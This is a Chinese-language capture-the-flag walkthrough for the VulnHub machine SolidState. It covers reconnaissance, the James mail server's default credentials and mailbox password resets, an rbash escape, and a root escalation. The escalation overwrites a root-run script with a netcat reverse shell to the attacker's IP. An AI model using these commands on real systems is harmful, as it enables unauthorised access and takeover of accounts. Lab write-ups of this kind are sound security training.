OSCP难度靶机之SolidState

admin 2022年3月22日02:16:33评论109 views字数 1306阅读4分21秒阅读模式

虚拟机信息:

虚拟机下载地址:https://www.vulnhub.com/entry/solidstate-1,261/

虚拟机简介:获取远程系统root权限

目标:1个用户flag和1个root权限flag

级别:中级

1、主机探测

netdiscover -r 192.168.207.0/24

OSCP难度靶机之SolidState

2、服务探测

nmap -A -sS -sV -v -p- 192.168.207.138

查看开放端口为22、25、80、110、119、445

OSCP难度靶机之SolidState

3、渗透测试

3.1 http扫描测试

1.通过nikto进行扫描测试

nikto -host http://192.168.207.138

未发现有用信息

OSCP难度靶机之SolidState

2.使用gobuster爆破

gobuster dir -u http://192.168.207.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s "404,301,302,307,403,500"

未发现有用信息

OSCP难度靶机之SolidState

3.2 James控制台测试

1.查看端口4555位James控制台

使用默认账号密码为:root/root登录成功,查看当前用户

OSCP难度靶机之SolidState

2.查看当前用户信息

listusers

发现存在5个用户

OSCP难度靶机之SolidState

3.重置用户密码

在帮助文档中有重置用户密码方法

OSCP难度靶机之SolidState

setpassword james 123456
setpassword thomas 123456
setpassword john 123456
setpassword mindy 123456
setpassword mailadmin 123456

OSCP难度靶机之SolidState

4.登录邮箱进行测试

telnet 192.168.207.138 110
USER mindy
PASS 123456
LIST
TOP 2 836

在mindy账号中发现SSH登录账号和密码,用户名为:mindy,密码为:P@55W0rd1!2@

OSCP难度靶机之SolidState

3.3 登录SSH控制台

1.通过ssh进行登录

ssh [email protected]

发现无法执行命令

OSCP难度靶机之SolidState

2.查看授权shell

查看指定的shell为rbash

OSCP难度靶机之SolidState

3.通过ssh登录指定shell

ssh [email protected] "export TERM=xterm; python -c 'import pty; pty.spawn("/bin/sh")'"

OSCP难度靶机之SolidState

4.查看用户flag

cat user.txt

OSCP难度靶机之SolidState

3.4 提权操作

1.查看本地存在bash权限用户

cat /etc/passwd | grep bash

OSCP难度靶机之SolidState

2.查看用户启动进程

ps -aux | grep james

查看james用户启动的权限为root

OSCP难度靶机之SolidState

3.查看/opt目录文件信息

cat /opt/tmp.py
ls -lah /opt/tmp.py

OSCP难度靶机之SolidState

4.测试在/tmp中写入文件

OSCP难度靶机之SolidState

5.导入文件

echo "import os nos.system('nc 192.168.207.129 4444 -e /bin/sh')" > /opt/tmp.py

OSCP难度靶机之SolidState

5.等待2-3分钟获取反弹shell

OSCP难度靶机之SolidState

6.获取flag信息

python -c 'import pty; pty.spawn("/bin/sh")'
cat root.txt

OSCP难度靶机之SolidState

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之SolidState

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月22日02:16:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之SolidStatehttp://cn-sec.com/archives/835080.html

发表评论

匿名网友 填写信息